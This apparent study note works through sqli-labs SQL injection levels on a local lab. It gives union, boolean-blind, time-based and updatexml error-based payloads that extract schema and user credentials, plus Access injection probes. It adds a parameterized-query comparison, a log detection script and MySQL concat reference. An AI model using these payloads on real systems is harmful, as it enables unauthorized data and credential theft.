Safety notes
2022-07-06 09:52:00 【XRSec】
Basic MySQL enumeration queries (information_schema):
List databases:
select schema_name from information_schema.schemata
List tables:
select table_name from information_schema.tables where table_schema='security'
List columns:
select column_name from information_schema.columns where table_name='users'
Read fields:
select username,password from security.users
sqli-labs practice

less-01
  Back-end query: SELECT * FROM users WHERE id='1' LIMIT 0,1;
  LIMIT 0,1: the first number is the offset (0 means start at the first row), the second is how many rows to return.
  SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1
  Comment styles: --+ (the + is a URL-encoded space, so MySQL receives "-- "), -- , #
  Logic: A and B is true only when both are true; A or B is true when either one is true.
  id=1' produces SELECT * FROM users WHERE id='1'' (unbalanced quote, syntax error). The less-01 data has 3 columns.
  Useful functions and variables: system_user() user() current_user() database() version() @@datadir @@version_compile_os group_concat() concat_ws('~',A,B) -> A~B
  Results: databases information_schema, challenges, mysql, performance_schema, security, test; current database security; tables in security: emails, referers, uagents, users; columns in users: id, username, password
  group_concat(concat_ws(0x7e,username,password)) from security.users   (0x7e is '~')  -> admin~password,admin1~pass,
  Parameter wrappers: '1'  1  ('1')

Boolean-based blind (less-05)
  select ascii(substr((select database()),1,1));   database() is security, so this is ascii('s') = 115
  Burp Suite: proxy; security; crow_1; condition length(database())=8
  http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+
  http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
  http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+
  ascii(substr((select database()),1,1))> 156 is false for security; narrow the value by bisection over 1..156 (next probe 100):
  http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10--+   (then 99)
  Building the if() condition step by step: select database() -> substr((select database()),1,1) -> ascii(substr((select database()),1,1)) ->
  select if(ascii(substr((select database()),1,1)) > 10, 2,3);
  MySQL query statements for less01-less10: the four information_schema queries listed at the top of these notes.

less-11
  select 1=1 and 1=2;   select 1=1 or 1=2;
  uname=n' union select 1, schema_name from information_schema.schemata limit 1,1#&passwd=admin&submit=Submit
  uname=n' union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit   -> security
  uname=n' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit
  Summary: less-1 is GET, less-11 is POST. Wrapper variants: '  ')  '))  "  ")  "))
  select * from users where user_id = '1';
  select * from users where user_id = '1111 ' or 1=1 #
  select database();
  group_concat(concat(0x7e,username,password)) from security.users   -> ~username~password

less-13
  select length(database());
  if() with length(): if(length(database())>1,1,sleep(5));
  The database name is 8 characters long. left(database(),1)='a'
  uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
  Character set to walk: A-Z, 0-9, _

less-14
  uname=admin " or length(database())='8'#&passwd=admin&submit=Submit
  A or B / A and B
  uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
  uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
  uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit

less-15
  uname=admin&passwd=a' or length(database())='8'#&submit=Submit

less-16
  Wrappers by level: 13 ('ain'), 14 "admin", 15 'ain', 16 ("admin")
  uname=admin&passwd=admin") and 1=2#&submit=Submit

less-17 (error-based, updatexml)
  uname=admin&passwd=afafa'#&submit=Submit
  select updatexml(1,concat(0x7e,(database())),1);
  Template: select updatexml(1,concat(0x7e,(constructed subquery)),1);  The four information_schema queries above go in the subquery slot.
  and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
  and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)

less-18
  Back-end statement: INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin')
  The uagent value is the injection point; the same updatexml pattern applies:
  Template: ' or updatexml(1,concat(0x7e,()),1);
  select updatexml(1,concat(0x7e,(database())),1);
  ' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
  ' or updatexml(1,concat(0x7e,(database())),1), '','')#
  ' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')#
  ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')#
  ' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')#
  ' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')#
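As an added example (not from the original notes and not sqli-labs code), the less-01 query shape is placed beside a parameterized version, using Python's sqlite3 in place of MySQL and a constructed users table: the input that returns every row from the string-built query matches nothing once it is bound as a parameter.

```python
import sqlite3

# Constructed stand-in for sqli-labs' security.users (names and passwords
# are made up; the table layout follows the notes above).
SAMPLE_USERS = [(1, "admin", "password"), (2, "admin1", "pass"), (3, "guest", "guest")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # less-01 shape: the request parameter is spliced into the SQL text, so a
    # quote in the input closes the literal and the rest is parsed as SQL.
    # With "1' or 1=1-- " the WHERE becomes always-true and "-- " comments out
    # the trailing quote and the LIMIT 0,1, so every row comes back.
    sql = f"SELECT id, username FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    # Hardened shape: the statement text is fixed and the value is sent as a
    # bound parameter, so the same input is compared as one opaque string and
    # matches no id. LIMIT 0,1 stays in force because it is part of the text.
    sql = "SELECT id, username FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_allowlisted(conn: sqlite3.Connection, user_id: str) -> list:
    # Defence in depth: id is numeric by contract, so reject anything that is
    # not a non-negative integer before it reaches the database at all.
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return lookup_parameterized(conn, str(int(user_id)))


if __name__ == "__main__":
    db = make_db()
    payload = "1' or 1=1-- "
    print("vulnerable:   ", lookup_vulnerable(db, payload))     # all three rows
    print("parameterized:", lookup_parameterized(db, payload))  # []
    try:
        lookup_allowlisted(db, payload)
    except ValueError as exc:
        print("allowlisted:  ", exc)
```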
Hexadecimal literals: 0x followed by the hex encoding of the string (0x7365637572697479 is 'security', 0x7e is '~'), which avoids quotes in the payload.
Manual injection
2%'and(select count(*)from mssysaccessobjects)>0 and '%'='       // page returns normally: it is an Access database
2%'and(select count(*)from admin_user)>0 and '%'='               // page returns normally: the table admin_user exists
2%'and(select count(username)from admin_user)>0 and '%'='        // page returns normally: the column username exists
2%'and(select count(password)from admin_user)>0 and '%'='        // page returns normally: the column password exists
2%'and(select top 1 len(admin)from admin_user)>4 and '%'='       // page returns normally: the username length is greater than 4
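Added example, not part of the original notes: a small log triage script that flags the probe families appearing in the sqli-labs and Access sections (schema enumeration, updatexml, ascii/substr, sleep, union select, or 1=1) in constructed access-log lines. The log lines, paths and request targets are made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Payload families from the notes above, applied to the decoded, lower-cased
# request target. They are triage signals, not proof: comments, encodings and
# synonyms can slip past simple patterns, so alert first, then read the request.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "schema_enum":  re.compile(r"information_schema\.|mssysaccessobjects"),
    "error_based":  re.compile(r"\bupdatexml\s*\("),
    "blind_bool":   re.compile(r"\bascii\s*\(\s*substr\s*\(|\bleft\s*\(\s*\(\s*select\b"),
    "blind_time":   re.compile(r"\bsleep\s*\("),
    "tautology":    re.compile(r"\bor\s+1\s*=\s*1\b"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalize(target: str) -> str:
    # unquote_plus turns the notes' "--+" into "-- " and undoes %XX escapes;
    # decoding twice also catches double-encoded input. Whitespace is collapsed
    # so "ascii (substr(" and "ascii(substr(" look the same to the patterns.
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", " ", decoded.lower())


def classify(log_line: str) -> list:
    # Sorted names of every indicator that fires on the line's request target,
    # or [] for a line without a request or without any probe pattern.
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = normalize(m.group(1))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(target))


# Constructed combined-format access-log lines (not captured traffic); the
# request targets reproduce the probe shapes that appear in the notes above.
SAMPLE_LOG = [
    '127.0.0.1 - - [06/Jul/2022:09:52:00 +0800] "GET /sqli/Less-5/?id=1 HTTP/1.1" 200 712',
    '127.0.0.1 - - [06/Jul/2022:09:52:01 +0800] "GET /sqli/Less-5/?id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%201,1),1,1))%20%3E100--+ HTTP/1.1" 200 712',
    '127.0.0.1 - - [06/Jul/2022:09:52:02 +0800] "GET /sqli/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20schema_name%20from%20information_schema.schemata%20limit%200,1)),1)--+ HTTP/1.1" 200 612',
    '127.0.0.1 - - [06/Jul/2022:09:52:03 +0800] "GET /sqli/Less-5/?id=1%27%20and%20if(length(database())%3E1,1,sleep(5))--+ HTTP/1.1" 200 712',
    '127.0.0.1 - - [06/Jul/2022:09:52:04 +0800] "GET /news.asp?id=2%25%27and(select%20count(*)from%20mssysaccessobjects)%3E0%20and%20%27%25%27=%27 HTTP/1.1" 200 4012',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "clean", "<-", line)
```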
Usage of concat(), concat_ws() and group_concat() in MySQL

1. CONCAT() function
CONCAT() joins several strings into one string. Using the table info as an example, SELECT id,name FROM info LIMIT 1; returns
+----+--------+
| id | name   |
+----+--------+
|  1 | BioCyc |
+----+--------+
1) Syntax and behaviour: CONCAT(str1,str2,...)
Returns the string formed by joining the arguments. If any argument is NULL, the result is NULL. One or more arguments may be given.
2) Examples:
SELECT CONCAT(id, ',', name) AS con FROM info LIMIT 1;
returns
+----------+
| con      |
+----------+
| 1,BioCyc |
+----------+
SELECT CONCAT('My', NULL, 'QL');
returns
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL                     |
+--------------------------+
3) Specifying a separator between arguments: CONCAT_WS()
Syntax: CONCAT_WS(separator,str1,str2,...)
CONCAT_WS() stands for CONCAT With Separator and is a special form of CONCAT(). The first argument is the separator for the remaining arguments and is placed between each pair of strings being joined; it can be a string or any other expression. If the separator is NULL, the result is NULL. The function skips every NULL value after the separator argument, but it does not skip empty strings.
For example, SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1; returns
+----------+
| con_ws   |
+----------+
| 1_BioCyc |
+----------+
SELECT CONCAT_WS(',','First name',NULL,'Last Name'); returns
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name                         |
+----------------------------------------------+
2. GROUP_CONCAT() function
GROUP_CONCAT returns a string made up of the concatenated values of a group. Using the table info as an example, the statement
SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764');
returns
+----------+----+-------------------------+
| locus    | id | journal                 |
+----------+----+-------------------------+
| AB086827 |  1 | Unpublished             |
| AB086827 |  2 | Submitted (20-JUN-2002) |
| AF040764 | 23 | Unpublished             |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+-------------------------+
1) Syntax and behaviour:
GROUP_CONCAT([DISTINCT] expr [,expr ...] [ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]] [SEPARATOR str_val])
In MySQL this returns the concatenated values of the expressions within each group. DISTINCT excludes duplicate values. ORDER BY sorts the values in the result. SEPARATOR is a string inserted between the values; the default is a comma (","), and SEPARATOR "" removes the separator entirely. The variable group_concat_max_len sets a maximum length and is changed at run time with:
SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;
If a maximum length is set, the result is truncated to that length. If the grouped string is too long, raise the system parameter:
SET @@global.group_concat_max_len=40000;
2) Examples:
SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
returns
+----------+------------------+
| locus    | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2              |
| AF040764 | 23,24            |
+----------+------------------+
SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
returns
+----------+----------------------------------------------------------+
| locus    | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1                                                      |
| AF040764 | 24_23                                                    |
+----------+----------------------------------------------------------+
SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
returns
+----------+--------------------------------------------------------------------------+
| locus    | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished                               |
| AF040764 | 24, Submitted (31-DEC-1997). 23, Unpublished                             |
+----------+--------------------------------------------------------------------------+